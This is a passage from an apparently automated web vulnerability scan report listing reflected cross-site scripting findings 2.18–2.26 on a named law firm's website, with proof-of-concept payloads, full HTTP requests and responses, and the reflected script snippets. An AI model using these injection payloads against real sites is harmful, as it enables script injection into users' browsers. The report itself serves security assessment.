Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1169; path=/
Set-Cookie: PortletId=1162901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Women's Forum</title>
<meta name
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/forum/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/forum/Diversity.aspx?cb6be'-alert(1)-'7a5f32d74e6=1';//]]>
...[SNIP]...

2.18. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /honorsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=1136501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Honors & Rankings</title>
<meta name="language
...[SNIP]...
ent.aspnetForm.action = '/honorsrankings/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/honorsrankings/AboutSection.aspx?f4088'-alert(1)-'6fb7096a36d=1';//]]>
...[SNIP]...

2.19. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /leadersindiversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1152; path=/
Set-Cookie: PortletId=1143501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Leaders in Diversity</title>
<meta
...[SNIP]...
spnetForm.action = '/leadersindiversity/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/leadersindiversity/Diversity.aspx?1cac5'-alert(1)-'90719ebe248=1';//]]>
...[SNIP]...

2.20. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /legalnotices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1165; path=/
Set-Cookie: PortletId=1156501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Legal Notices</title>
<meta name="language" co
...[SNIP]...
ment.aspnetForm.action = '/legalnotices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/legalnotices/GeneralPageData.aspx?a0792'-alert(1)-'83d5d12175f=1';//]]>
...[SNIP]...

2.21. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /mclarty

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:44:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1407; path=/
Set-Cookie: PortletId=4044201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | McLarty Associates</title>
<meta name="languag
...[SNIP]...
[CDATA[
document.aspnetForm.action = '/mclarty/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/mclarty/AboutSection.aspx?354a9'-alert(1)-'6c85014edb2=1';//]]>
...[SNIP]...

2.22. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:41:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1';//]]>
...[SNIP]...

2.23. http://www.cov.com/news/detail.aspx [news parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91';//]]>
...[SNIP]...

2.24. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /newsandevents

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1157; path=/
Set-Cookie: PortletId=1148501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | News & Events</title>
<meta name="language" co
...[SNIP]...
ent.aspnetForm.action = '/newsandevents/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/newsandevents/NewsEventsPubs.aspx?f75a8'-alert(1)-'99f649b592f=1';//]]>
...[SNIP]...

2.25. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /offices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=1152501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Offices</title>
<meta name="language" content=
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/offices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/offices/List.aspx?2c98b'-alert(1)-'fd3b25fecf2=1';//]]>
...[SNIP]...

2.26. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:08 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
